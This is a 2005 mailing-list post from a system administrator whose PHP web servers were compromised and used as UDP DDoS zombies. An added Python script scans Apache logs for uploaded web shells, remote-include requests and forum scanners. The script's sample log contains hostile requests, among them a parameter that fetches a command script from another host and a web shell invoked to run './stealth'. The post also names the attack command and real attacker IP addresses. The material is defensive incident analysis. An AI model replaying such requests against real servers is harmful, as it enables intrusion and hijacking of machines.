I have also had two servers compromised in a similar manner. Both machines were running White Box Enterprise Linux 3.0 (a RedHat EL clone, for those not familiar), and both were up to date with all the latest patches (I update weekly, except for the kernel).

On the first machine, about two or three weeks ago, I discovered a shell running a perl script out of /tmp which was a UDP DDoS zombie program. As far as I could tell, it got in through PHP somewhere, but I couldn't tell where for sure. It's possible it came in through a vulnerable phpBB2 installation, but I can not say for sure.

The second machine, which has been the subject of DDoS attacks for the past week (about 40 megabits of inbound UDP traffic hitting the machine for around 30 to 40 minutes, at random periods), ended up being a DDoS zombie as well, severely affecting my systems by consuming all of my bandwidth. This one definitely got in through PHP, as I found several PHP files containing a "phpshell" program which was obviously used to execute the shell commands which started a "sh -c ./stealth <ip address>" process which DoS'd the target host. However, I really have no idea /how/ this happened.

I have also heard from other people 'round the net and IRC that this is happening to a lot of servers. Is this a security vulnerability in Apache2/PHP, or simply a case of an exploitable configuration that many people use?

Some notes I've made on the situation: nearly all attacking hosts have been IP addresses that are assigned through RIPE (thus, are in Europe). They appear to be compromised servers. One IP address making repeated requests for the now-removed phpshell file is 83.103.184.208, also assigned through RIPE. Another odd thing was that 69.218.121.228 made quite a few requests of my server searching for things like "/forum", "/phpBB", "/bb" and the like, obviously looking for exploitable phpBB installations.
I have no evidence to say such, but I think the attacks I was on the receiving end of are the same type of attack that was being dished out. I have the UDP flooder script that was deposited in /tmp on the first server, but (oddly) I couldn't locate the "stealth" script on the second server. Try as I might, I could not locate a file by that name on the filesystem.

On Sat, 2005-04-30 at 22:11, a.list.address@xxxxxxxxx wrote:
> Looks like someone was trying to use your server as a DDoS zombie.
> What kind of Perl or PHP scripts are on your server? Look in your
> Apache access log for POST requests that may have uploaded one of
> these files, or GET/POST requests that may have uploaded a URL to
> download one of these files. See if you can figure out how it got on
> your server.

-- 
- Nick Bright
Terraworld, Inc
888-332-1616 x315
http://home.terraworld.net
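The access-log review the quoted reply recommends, written out as an added example (this is not code from the original thread or from either poster): a Python script that parses Apache combined-format log lines and flags the four patterns this thread describes, POSTs to .php files (a shell being uploaded or driven), query parameters whose value is itself a URL (a request that makes the server fetch a script from elsewhere), hits on the dropped shell's filename including the 404s for the now-removed copy, and one client walking a list of forum paths. It then pulls one client's full timeline so you can see what that IP did before the shell appeared. The log lines are constructed for the example and use RFC 5737 documentation addresses rather than the real IPs quoted above; the forum path prefixes, the "phpshell" filename and the scanner threshold are assumptions taken from the post's own observations, so adjust them to what you actually find on the box.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" LogFormat. A line whose request field is malformed
# (for example a bare "-") does not match and is skipped, not fatal.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Assumptions for this example: the forum paths a phpBB scanner probes
# (taken from the post) and the name of the dropped shell.
SCANNER_PREFIXES = ("/forum", "/phpbb", "/bb", "/board")
WEBSHELL_NAMES = ("phpshell",)
SCANNER_THRESHOLD = 3   # distinct forum paths from one IP before it is flagged

# Constructed sample log, not real traffic; RFC 5737 documentation addresses.
SAMPLE_LOG = """\
192.0.2.10 - - [30/Apr/2005:21:02:11 -0500] "GET /forum/ HTTP/1.0" 404 289 "-" "Mozilla/4.0"
192.0.2.10 - - [30/Apr/2005:21:02:12 -0500] "GET /phpBB/ HTTP/1.0" 404 289 "-" "Mozilla/4.0"
192.0.2.10 - - [30/Apr/2005:21:02:12 -0500] "GET /bb/ HTTP/1.0" 404 289 "-" "Mozilla/4.0"
192.0.2.10 - - [30/Apr/2005:21:02:13 -0500] "GET /phpBB2/viewtopic.php?t=1 HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
203.0.113.7 - - [30/Apr/2005:21:05:41 -0500] "GET /index.php?page=http://203.0.113.9/cmd.txt HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [30/Apr/2005:21:06:02 -0500] "POST /images/phpshell.php HTTP/1.1" 200 1834 "-" "-"
203.0.113.7 - - [30/Apr/2005:21:06:30 -0500] "GET /images/phpshell.php?cmd=./stealth HTTP/1.1" 200 40 "-" "-"
198.51.100.3 - - [30/Apr/2005:22:41:09 -0500] "GET /images/phpshell.php HTTP/1.1" 404 289 "-" "-"
198.51.100.5 - - [30/Apr/2005:22:50:00 -0500] "GET /index.php HTTP/1.1" 200 2048 "http://example.com/" "Mozilla/5.0"
"""
SAMPLE_LINES = SAMPLE_LOG.splitlines()


def parse_line(line):
    """One combined-format line to a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def remote_url_params(rec):
    """Query parameters whose value is a URL: a request asking the server
    to fetch and run a script hosted on another (usually compromised) host."""
    return [(k, v) for k, v in rec["query"]
            if v.lower().startswith(("http://", "https://", "ftp://"))]


def find_suspicious(lines):
    hits = {"php_posts": [], "remote_url_params": [],
            "webshell_probes": [], "scanner_ips": {}}
    scanner_paths = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        lp = rec["path"].lower()
        # 1. POST to a PHP file: the upload, or commands driven through a shell
        if rec["method"] == "POST" and lp.endswith(".php"):
            hits["php_posts"].append((rec["ip"], rec["path"], rec["status"]))
        # 2. URL smuggled in a parameter (server-side fetch of the payload)
        urls = remote_url_params(rec)
        if urls:
            hits["remote_url_params"].append((rec["ip"], rec["path"], urls))
        # 3. Any hit on the shell's name, 404s included (who keeps coming back)
        if any(name in lp for name in WEBSHELL_NAMES):
            hits["webshell_probes"].append((rec["ip"], rec["path"], rec["status"]))
        # 4. One client trying several forum paths in turn
        if any(lp.startswith(p) for p in SCANNER_PREFIXES):
            scanner_paths[rec["ip"]].add(lp)
    hits["scanner_ips"] = {ip: sorted(paths) for ip, paths in scanner_paths.items()
                           if len(paths) >= SCANNER_THRESHOLD}
    return hits


def actor_timeline(lines, ip):
    """Everything one client did, in log order. Once a shell hit is found,
    the requests that IP made before it are where the entry point is."""
    return [(r["time"], r["method"], r["target"], r["status"])
            for r in map(parse_line, lines) if r and r["ip"] == ip]


if __name__ == "__main__":
    for kind, rows in find_suspicious(SAMPLE_LINES).items():
        print(kind, rows)
    for row in actor_timeline(SAMPLE_LINES, "203.0.113.7"):
        print(*row)
```

Run it against a real log with `SAMPLE_LINES` replaced by `open("/var/log/httpd/access_log")`; the `webshell_probes` list answers the "repeated requests for the removed file" observation directly, and the timeline of the first IP to get a 200 from the shell is where to look for how it was written in the first place. Note that this only sees what reached the web server: if the shell was written via a PHP include that fetched its payload, the tell is the URL-in-parameter request, not a POST.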